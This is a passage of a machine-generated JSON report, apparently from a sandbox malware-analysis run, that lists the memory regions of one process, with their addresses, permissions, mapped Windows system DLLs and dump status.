"process_00000006-region_00000950-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_217", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_950", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:23.255", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000951-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_218", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_951", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:23.255", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000952-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_219", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_952", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:23.255", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_953", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:23.256", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000954-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_220", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_954", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:23.256", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_955", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:23.256", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000956-addr_0x00000000001e0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_221", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 2490367, "entry_point": 0, "filename": null, "id": "region_956", "name": "private_0x00000000001e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1966080, "timestamp": "00:01:23.262", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1947795456, "type": "region", "version": 1 }, "end_va": 1948172287, "entry_point": 1947795456, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_957", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1947795456, "timestamp": "00:01:23.263", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1948188672, "type": "region", "version": 1 }, "end_va": 1948446719, "entry_point": 1948188672, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_958", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1948188672, "timestamp": "00:01:23.267", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1948647424, "type": "region", "version": 1 }, "end_va": 1948680191, "entry_point": 1948647424, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_959", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1948647424, "timestamp": "00:01:23.271", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000960-addr_0x0000000000300000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_222", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 4194303, "entry_point": 0, "filename": null, "id": "region_960", "name": "private_0x0000000000300000", "norm_filename": null, "region_type": "private_memory", "start_va": 3145728, "timestamp": "00:01:23.286", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1993801728, "type": "region", "version": 1 }, "end_va": 1994088447, "entry_point": 1993801728, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_961", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1993801728, "timestamp": "00:01:23.286", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1995440128, "type": "region", "version": 1 }, "end_va": 1996554239, "entry_point": 1995440128, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_962", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1995440128, "timestamp": "00:01:23.329", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000963-addr_0x0000000077860000-size_0x00000000000fa000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_223", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1024000, "start_va": 2005270528, "type": "region", "version": 1 }, "end_va": 2006294527, "entry_point": 0, "filename": null, "id": "region_963", "name": "private_0x0000000077860000", "norm_filename": null, "region_type": "private_memory", "start_va": 2005270528, "timestamp": "00:01:23.495", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000964-addr_0x0000000077960000-size_0x000000000011f000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_224", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1175552, "start_va": 2006319104, "type": "region", "version": 1 }, "end_va": 2007494655, "entry_point": 0, "filename": null, "id": "region_964", "name": "private_0x0000000077960000", "norm_filename": null, "region_type": "private_memory", "start_va": 2006319104, "timestamp": "00:01:23.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_965", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:23.617", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_966", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:23.617", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1732607, "entry_point": 1310720, "filename": "\\Windows\\System32\\locale.nls", "id": "region_967", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1310720, "timestamp": "00:01:23.617", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1970470912, "type": "region", "version": 1 }, "end_va": 1970774015, "entry_point": 1970470912, "filename": "\\Windows\\SysWOW64\\mscoree.dll", "id": "region_968", "name": "mscoree.dll", "norm_filename": "c:\\windows\\syswow64\\mscoree.dll", "region_type": "memory_mapped_file", "start_va": 1970470912, "timestamp": "00:01:23.618", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 1970798592, "type": "region", "version": 1 }, "end_va": 1970880511, "entry_point": 1970798592, "filename": "\\Windows\\SysWOW64\\atl.dll", "id": "region_969", "name": "atl.dll", "norm_filename": "c:\\windows\\syswow64\\atl.dll", "region_type": "memory_mapped_file", "start_va": 1970798592, "timestamp": "00:01:23.630", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1970995200, "type": "region", "version": 1 }, "end_va": 1971044351, "entry_point": 1970995200, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_970", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1970995200, "timestamp": "00:01:23.635", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1971060736, "type": "region", "version": 1 }, "end_va": 1971453951, "entry_point": 1971060736, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_971", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1971060736, "timestamp": "00:01:23.639", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1971716096, "type": "region", "version": 1 }, "end_va": 1972420607, "entry_point": 1971716096, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_972", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1971716096, "timestamp": "00:01:23.644", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1975123968, "type": "region", "version": 1 }, "end_va": 1976172543, "entry_point": 1975123968, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_973", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1975123968, "timestamp": "00:01:23.656", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 1989083136, "type": "region", "version": 1 }, "end_va": 1989672959, "entry_point": 1989083136, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_974", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1989083136, "timestamp": "00:01:23.703", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1991507968, "type": "region", "version": 1 }, "end_va": 1991548927, "entry_point": 1991507968, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_975", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1991507968, "timestamp": "00:01:23.738", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1991573504, "type": "region", "version": 1 }, "end_va": 1992228863, "entry_point": 1991573504, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_976", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1991573504, "timestamp": "00:01:23.744", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1992228864, "type": "region", "version": 1 }, "end_va": 1993211903, "entry_point": 1992228864, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_977", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1992228864, "timestamp": "00:01:23.808", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1993211904, "type": "region", "version": 1 }, "end_va": 1993797631, "entry_point": 1993211904, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_978", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1993211904, "timestamp": "00:01:23.815", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1994129408, "type": "region", "version": 1 }, "end_va": 1994772479, "entry_point": 1994129408, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_979", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1994129408, "timestamp": "00:01:23.821", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1995309056, "type": "region", "version": 1 }, "end_va": 1995411455, "entry_point": 1995309056, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_980", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1995309056, "timestamp": "00:01:23.827", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1998651392, "type": "region", "version": 1 }, "end_va": 2000076799, "entry_point": 1998651392, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_981", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1998651392, "timestamp": "00:01:23.832", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 2003697664, "type": "region", "version": 1 }, "end_va": 2004054015, "entry_point": 2003697664, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_982", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 2003697664, "timestamp": "00:01:24.055", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_983", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:24.119", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_984", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:24.120", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000985-addr_0x0000000000400000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_225", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 5242879, "entry_point": 0, "filename": null, "id": "region_985", "name": "private_0x0000000000400000", "norm_filename": null, "region_type": "private_memory", "start_va": 4194304, "timestamp": "00:01:24.142", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000986-addr_0x00000000005c0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_226", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 6029312, "type": "region", "version": 1 }, "end_va": 6094847, "entry_point": 0, "filename": null, "id": "region_986", "name": "private_0x00000000005c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 6029312, "timestamp": "00:01:24.142", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 6094848, "type": "region", "version": 1 }, "end_va": 7700479, "entry_point": 0, "filename": null, "id": "region_987", "name": "pagefile_0x00000000005d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6094848, "timestamp": "00:01:24.142", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1990197248, "type": "region", "version": 1 }, "end_va": 1991032831, "entry_point": 1990197248, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_988", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1990197248, "timestamp": "00:01:24.142", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 2001141760, "type": "region", "version": 1 }, "end_va": 2001534975, "entry_point": 2001141760, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_989", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 2001141760, "timestamp": "00:01:24.149", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_990", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:24.184", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 466943, "entry_point": 0, "filename": null, "id": "region_991", "name": "pagefile_0x0000000000070000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 458752, "timestamp": "00:01:24.184", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 524288, "type": "region", "version": 1 }, "end_va": 536575, "entry_point": 524288, "filename": "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui", "id": "region_992", "name": "powershell.exe.mui", "norm_filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui", "region_type": "memory_mapped_file", "start_va": 524288, "timestamp": "00:01:24.184", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000993-addr_0x0000000000090000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_227", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 593919, "entry_point": 0, "filename": null, "id": "region_993", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:01:24.187", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000994-addr_0x00000000000a0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_228", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 655360, "type": "region", "version": 1 }, "end_va": 659455, "entry_point": 0, "filename": null, "id": "region_994", "name": "private_0x00000000000a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 655360, "timestamp": "00:01:24.188", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 7733248, "type": "region", "version": 1 }, "end_va": 9310207, "entry_point": 0, "filename": null, "id": "region_995", "name": "pagefile_0x0000000000760000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7733248, "timestamp": "00:01:24.188", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 9371648, "type": "region", "version": 1 }, "end_va": 30343167, "entry_point": 0, "filename": null, "id": "region_996", "name": "pagefile_0x00000000008f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9371648, "timestamp": "00:01:24.188", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000997-addr_0x0000000001cf0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_229", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 30343168, "type": "region", "version": 1 }, "end_va": 31391743, "entry_point": 0, "filename": null, "id": "region_997", "name": "private_0x0000000001cf0000", "norm_filename": null, "region_type": "private_memory", "start_va": 30343168, "timestamp": "00:01:24.188", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000998-addr_0x0000000001ed0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_230", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 32309248, "type": "region", "version": 1 }, "end_va": 32374783, "entry_point": 0, "filename": null, "id": "region_998", "name": "private_0x0000000001ed0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32309248, "timestamp": "00:01:24.189", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000999-addr_0x0000000001fb0000-size_0x0000000000040000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_231", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 33226752, "type": "region", "version": 1 }, "end_va": 33488895, "entry_point": 0, "filename": null, "id": "region_999", "name": "private_0x0000000001fb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 33226752, "timestamp": "00:01:24.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 524288, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1946484735, "entry_point": 1945960448, "filename": "\\Windows\\SysWOW64\\uxtheme.dll", "id": "region_1000", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\syswow64\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:01:24.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 987135, "entry_point": 0, "filename": null, "id": "region_1001", "name": "pagefile_0x00000000000f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 983040, "timestamp": "00:01:24.200", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 31391744, "type": "region", "version": 1 }, "end_va": 32305151, "entry_point": 0, "filename": null, "id": "region_1002", "name": "pagefile_0x0000000001df0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 31391744, "timestamp": "00:01:24.200", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001003-addr_0x0000000002140000-size_0x0000000000040000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_232", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 34865152, "type": "region", "version": 1 }, "end_va": 35127295, "entry_point": 0, "filename": null, "id": "region_1003", "name": "private_0x0000000002140000", "norm_filename": null, "region_type": "private_memory", "start_va": 34865152, "timestamp": "00:01:24.200", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1972436992, "type": "region", "version": 1 }, "end_va": 1972973567, "entry_point": 1972436992, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_1004", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1972436992, "timestamp": "00:01:24.200", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 1773567, "entry_point": 0, "filename": null, "id": "region_1005", "name": "pagefile_0x00000000001b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1769472, "timestamp": "00:01:24.211", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ 